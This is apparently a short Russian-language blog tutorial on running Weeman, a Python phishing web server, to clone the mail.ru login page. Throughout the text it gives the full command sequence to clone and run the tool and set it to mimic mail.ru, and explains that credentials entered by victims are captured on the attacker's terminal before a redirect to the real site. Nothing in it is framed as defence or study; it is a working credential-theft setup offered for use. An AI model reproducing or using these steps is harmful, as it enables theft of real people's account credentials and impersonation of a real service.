Weeman. Phishing - web-сервер
@webwareВсем привет! Здесь я хочу показать, как легко поднять простой, но довольно эффективный web-server для фишинга.
Он будет захватывать все введенные жертвой учетные данные в формах и собственно, передавать их на терминал сервера.
Софт, который будет использоваться – это Weeman, http сервер для фишинга, написанный на Python. Итак, для того чтобы воспользоваться им, откроем терминал и введем следующую команду.
> git clone https://github.com/Hypsurus/weeman
Затем перейдем в папку, куда был скачан сервер, и выполним следующие команды:
> cd weeman/
> ls –a
> chmod a+x weeman.py
> ./weeman.py
> help (сразу посмотрим доступные опции)
> show (посмотрим текущие настройки)
Используем weeman на примере mail.ru.
> set url hppts://mail.ru
> set port 8080
> set action_url https://mail.ru
> run
Теперь, при обращении к серверу по адресу, в моем случае это 192.168.0.101:8080, мы попадаем на фишинговый вариант сайта mail.ru, внешне ничем не отличается:
После того как мы введем свои учетные данные сработает редирект на подлинный сайт, а мы получим учетные данные.
На этом пожалуй все, спасибо за внимание.